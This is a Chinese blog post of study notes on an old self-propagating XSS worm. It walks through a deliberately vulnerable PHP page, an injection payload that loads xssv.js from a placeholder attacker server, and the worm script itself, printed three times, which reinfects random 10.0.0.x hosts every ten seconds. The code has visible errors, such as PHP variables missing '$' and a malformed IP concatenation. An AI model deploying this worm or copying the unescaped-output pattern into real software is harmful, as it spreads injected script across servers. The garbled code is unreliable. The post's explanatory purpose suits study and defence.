一个比较老的跨站(XSS)脚本病毒的个人笔记

最新推荐文章于 2024-07-12 16:08:50 发布
最新推荐文章于 2024-07-12 16:08:50 发布
阅读量368 收藏
点赞数
文章标签: 安全漏洞 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/user123987/article/details/115693018
版权

跨站(XSS)脚本病毒详解

导言:写这篇笔记的起因是看《黑客攻防技术宝典 浏览器实战》中提到了该XSS病毒脚本,但是书中对于病毒的传播细节以及原理没有进行详细的讲解,所以度娘了一下,才知道这个病毒的特点在于内网服务器之间的互相传染,感觉杀伤力比较鸡肋,但是确实传播性很强(个人感觉,,,也有可能是我没有看明白)。为了防止以后忘记了,所以写下了这篇笔记。

因为本人现在也是安全菜鸡阶段,部分笔记内容是个人理解,可能存在不正确的地方,欢迎各位大佬批评指正。

Web应用程序:index.php

<?php 
    p = HTTP_GET_VARS['param'];
    $filename = "./file.txt";

    # 如果传递的参数param不为空,将param的值写入到根目录下的file.txt文件中
    if($p!=""){
        handle = fopen(filename,"wb");
        fputs(handle, p);
        fclose($handle);
    }

    handle = fopen(filename,"r");
    contents = fread(handle, filesize($filename));
    fclose($handle);

    # 打印param的值到网页中
    print $contents;

?>

此网页的index.php托管于多个虚拟服务器在10.0.0.0/24子网中,也就是说从10.0.0.2-10.0.0.254存在多台虚拟服务器,虚拟服务器中存在index.php,所以感染的都是服务器。

之后攻击者构造了如下param参数以攻击上述网页代码,为了化简注入语句,将主要攻击函数写入了xssv.js文件中。

注入语句如下:

<iframe name = "iframe2" id="iframe2" src="hidden" style="dispaly:none"></iframe><script src="http://<webserver>/xssv.js"></script>

在Javascript文件中的内容如下,它自我繁殖的方式是通过setInterval()函数定期调用do_requesr()函数,目标网站的IP地址是随机挑选的10.0.0.0/24子网服务器。

# xssv.js

function loadIframe(iframeName, url){
    if(window.frames[iframeName]){
        window.frames[iframeName].location = url;
        return false;
    }
    else
        return true;
}

function do_request(){
    var ip = get_random_ip();
    var exploit_string = '<iframe name = "iframe2" id="iframe2"'+'src="hidden" style="display:none"></iframe>'+'<script src="http://webserver>/xssv.js"></script>';
    loadIframe("iframe2","http://"+ip+"/index.php?param="+exploit_string);
}

function get_random(){
    var ranNum = Math.round(Math.random()*255);
    return ranNum;
}

function get_random_ip(){
    return "10.0.0"+get_random();
}

setInterval("do_request()",10000);

论证过程:

假设服务器10.0.0.1和10.0.0.2服务器上都存在index.php页面,现在客户端10.0.0.23访问了10.0.0.1的该页面,构造了如下输入:

http://10.0.0.1/index.php?param='<iframe name = "iframe2" id="iframe2" src="hidden" style="dispaly:none"></iframe><script src="http://<webserver>/xssv.js"></script>'

10.0.0.1的index.php页面执行如下代码:

<?php 
    p = '<iframe name = "iframe2" id="iframe2" src="hidden" style="dispaly:none"></iframe><script src="http://<webserver>/xssv.js"></script>'
    
    $filename = "./file.txt";
    # 如果传递的参数param不为空,将param的值写入到根目录下的file.txt文件中
    
	handle = fopen(filename,"wb");
	fputs(handle, p);
	fclose($handle);

	handle = fopen(filename,"r");
	contents = fread(handle, filesize($filename));
	fclose($handle);

	print $contents;
?>

所以执行该页面的结果就是在该页面打印了:

<iframe name = "iframe2" id="iframe2" src="hidden" style="dispaly:none"></iframe>
<script src="http://<webserver>/xssv.js"></script>

所以该页面会执行加载http:///xssv.js中的内容:

# xssv.js

function loadIframe(iframeName, url){
    if(window.frames[iframeName]){
        window.frames[iframeName].location = url;
        return false;
    }
    else
        return true;
}

function do_request(){
    var ip = get_random_ip();
    var exploit_string = '<iframe name = "iframe2" id="iframe2"'+'src="hidden" style="display:none"></iframe>'+'<script src="http://webserver>/xssv.js"></script>';
    loadIframe("iframe2","http://"+ip+"/index.php?param="+exploit_string);
}

function get_random(){
    var ranNum = Math.round(Math.random()*255);
    return ranNum;
}

function get_random_ip(){
    return "10.0.0"+get_random();
}

setInterval("do_request()",10000);

所以此时http://10.0.0.1/index.php页面的内容等价于:

<iframe name = "iframe2" id="iframe2" src="hidden" style="dispaly:none"></iframe>

function loadIframe(iframeName, url){
    if(window.frames[iframeName]){
        window.frames[iframeName].location = url;
        return false;
    }
    else
        return true;
}

function do_request(){
    var ip = get_random_ip();
    var exploit_string = '<iframe name = "iframe2" id="iframe2"'+'src="hidden" style="display:none"></iframe>'+'<script src="http://webserver>/xssv.js"></script>';
    loadIframe("iframe2","http://"+ip+"/index.php?param="+exploit_string);
}

function get_random(){
    var ranNum = Math.round(Math.random()*255);
    return ranNum;
}

function get_random_ip(){
    return "10.0.0"+get_random();
}

setInterval("do_request()",10000);

假设生成的随机IP为10.0.0.2,所以该页面的执行结果为:

<iframe name = "iframe2" id="iframe2" src="http://10.0.0.2/index.php?param='<iframe name =  iframe2" id="iframe2" src="hidden" style="display:none"></iframe> <script src="http://webserver>/xssv.js"> </script>'" style="dispaly:none"></iframe>

所以该页面又会自动的去构造恶意输入去感染10.0.0.2所对应的网页,所以后面的感染相当于自动构造恶意输入替代人为构造恶意输入去感染。但是这种XSS病毒所影响的只是其所在的服务器。

所以这个./file.txt文件应该是存在了服务器端吧…

参考:
【1】https://my.oschina.net/u/4592855/blog/4417444
【2】黑客攻防技术宝典 浏览器实战篇 P30

咸鱼找不到工作
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
GBase 8a管理集群gcware的日志-vote leader、flower、candidate部分
jingjing1068的博客
04-18 530
环境 2节点集群 [gbase@gbase_rh7_001 log]$ gcadmin CLUSTER STATE: ACTIVE VIRTUAL CLUSTER MODE: NORMAL ============================================================= | GBASE COORDINATOR CLUSTER INFORMATION | ===========================
XSS脚本攻击剖析与防御.pdf
05-16
XSS脚本攻击剖析与防御》是一本专门剖析XSS安全的专业书,总共8章,主要包括的内容如下。第1章 XSS初探,主要阐述了XSS的基础知识,包括XSS的攻击原理和危害。第2章 XSS利用方式,就当前比较流行的XSS利用方式做...
XSS蠕虫&病毒--即将发生的威胁与最好的防御
05-28
XSS蠕虫&病毒--即将发生的威胁与最好的防御
XSS蠕虫病毒可能爆发 将威胁互联网安全
10-07 673
新闻来源:HARDSPELL/硬派网安全研究者最近发出警告,由于目前浏览器技术中的缺陷,互联网用户有可能面临一次非常严重的蠕虫病毒爆发。名为GNU Citizen的黑客组织已经发布了一些有关脚本(cross-site scripting,XSS)漏洞的细节,据此可以通过浏览器向用户电脑植入恶意程序。蠕虫将能够扫描那些包含漏洞网页的IP地址,然后在整个网络上迅速流行开来。这些漏洞目前已经收录在X
web漏洞——XSS攻击原理及防御
weixin_43806577的博客
08-28 709
XSS漏洞介绍 脚本(Cross-Site Script,简称为XSS脚本脚本攻击)是一种针对网应用程序的安全漏洞攻击技术,是代码注入的一种。它允许恶意用户将代码注入网页,其他用户在浏览网页时就会受到影响。 XSS漏洞危害: 挂马 盗取用户cookie DOS(拒绝服务)客户端浏览器 钓鱼攻击,高级钓鱼技巧 编写针对性的XSS病毒,删除目标文章,恶意篡改数据,...
网络安全(一)_病毒、蠕虫、木马、炸弹的区别及常见的病毒
JunsIr的技术栈
11-05 7569
网络安全-木马与病毒(各类病毒区分详解) 区分 计算机木马是一种后门程序,以窃取信息为主 病毒:破坏计算机功能或数据,能够自我复制的一组计算机指令或程序代码,以破坏为主 各种病毒 系统病毒(前缀:WIN32 /PE/ W32) 蠕虫病毒(Worm.BBeagle): 一段能进行自我传播,无须用户干预而可以自动触发执行额破坏性程序或代码 木马病毒、黑客病毒(Trojan.QQ3344): 通过...
XSS脚本攻击
01-27
脚本攻击(XSS)是Web应用程序中常见的安全问题,主要源于开发人员未对用户提交的数据进行充分的过滤和转义。攻击者利用这一弱点,能够在网页中注入恶意脚本,使得其他用户在访问该页面时执行这些脚本,从而导致...
解析如何防止XSS脚本攻击
01-31
这些规则适用于所有不同类别的XSS脚本攻击,可以通过在服务端执行适当的解码来定位映射的XSS以及存储的XSS,由于XSS也存在很多特殊情况,因此强烈推荐使用解码库。另外,基于XSS的DOM也可以通过将这些规则运用在...
XSS的基本了解
adaosanqian的博客
02-28 1062
xss的基本了解与基础知识,无实战内容,只有理论知识
语句大全
11-22
比较全的语句攻略http://www.freebuf.com/articles/web/153055.html
XSS病毒写法(10年前的东西)
Coisini的博客
05-22 670
(xss)脚本病毒编写详解 (HaCkXi译文)2009-02-23 08:55下面的概念证明表明了XSS病毒。脆弱的环境造成就是一个例子情景的XSS所需的病毒,并不表明详尽的一套可能的条件。这说明在长期的XSS一个web应用。在这种情况下,漏洞是通过利用获得的请求,这使得小病毒将创建。 最初的一个实例脆弱的web应用将种子与自我传播的代码。当此代码是由网页浏览器,它的结果在他们的感染。被感染...
XSS详细讲解
热门推荐
qq_44857938的博客
06-18 1万+
XSS 1.XSS简介 (1)XSS简介 XSS作为OWASP TOP 10之一。 XSS中文叫做脚本攻击(Cross-site scripting),本名应该缩写为CSS,但是由于CSS(Cascading Style Sheets,层叠样式脚本)重名,所以更名为XSSXSS脚本攻击)主要基于javascript(js)来完成恶意的攻击行为。 XSS是一种经常出现在web应用中的计算机大全漏洞,也是web中最主流的攻击方式。那么什么是XSS呢? XSS是指恶意攻击者利用网对用
XSS脚本攻击与测试语句大全
weixin_30888707的博客
04-19 549
一、什么是XSS攻击   XSS又叫 CSS (Cross Site Script) ,脚本攻击。它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常呼略其危害性。而本文主要讲的是利用XSS得到目标服务器的shell。技术虽然是...
了解js (xss)攻击
昊喵喵博士
02-20 2377
什么是XSS js代码攻击也就是XSS(Cross Site Scripting)攻击,全称为脚本攻击。为了和CSS(Cascading Style Sheet)区分,故称为XSSXSS攻击通常指的是通过利用网页开发时留下的漏洞,通过巧妙的方法注入恶意指令代码到网页,使用户加载并执行攻击者恶意制造的网页程序。这些恶意网页程序通常是JavaScript,但实际上也可以包括Java,VBSc...
前端宝典大合集(一)
山有木兮木有枝 心悦君兮君不知
01-28 604
问题一:写一个处理加法可能产生精度的函数,比如 0.1 + 0.2 = 0.3 我们都知道0.1+0.2 = 0.3但是在js中 0.1+0.2 = 0.30000000000000004 1.1*100 = 110.00000000000001 1-0.9 = 0.09999999999999998 原因在于:能被计算机读懂的是二进制,而不是十进制,所以我们先把 0.1 和 0.2 转换成二进制看看: 0.1 => 0.0001 1001 1001 1001…(无限循环) 0.2 =&.
Iframe使用总结(实战)
杨春建的博客
08-22 5033
原文地址:http://blog.csdn.net/cuew1987/article/details/11265153 说在前面的话,iframe是可以做很多事情的。 例如: a>通过iframe实现域; b>使用iframe解决IE6下select遮挡不住的问题 c>通过iframe解决Ajax的前进后退问题 d>通过iframe实现异步上传。(Easyui中form组件就是用
DNSSec:网络安全的守护者
jiamisoft的博客
07-12 398
DNSSec是一种安全协议,它为DNS查询和响应过程提供了额外的加密层。通过使用公钥基础设施(PKI)和数字签名,DNSSec能够验证DNS响应的真实性,从而防止DNS欺骗攻击,即攻击者将用户重定向到恶意网的行为。
医疗健康信息的安全挑战与隐私保护最佳实践
最新发布
2301_79955948的博客
07-12 1347
随着医疗信息化的发展,医疗健康数据呈现出爆炸式的增长,医院信息系统、电子病历、健康管理等产生了海量的数据,这些数据的管理和保护成为了巨大的挑战。最新的研究和政策动态显示,国家卫生健康委员会等政府部门正在积极推动医疗健康信息安全管理规范的制定和实施,以加强数据安全和个人健康医疗数据相关的隐私保护。隐私保护的最佳实践包括建立完善的数据安全管理制度、规范医疗健康数据的收集、存储和传输过程,防止数据泄露。这些要求和措施有助于确保医疗健康信息的安全性和个人隐私的保护,减少信息泄露的风险,并促进医疗行业的健康发展。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值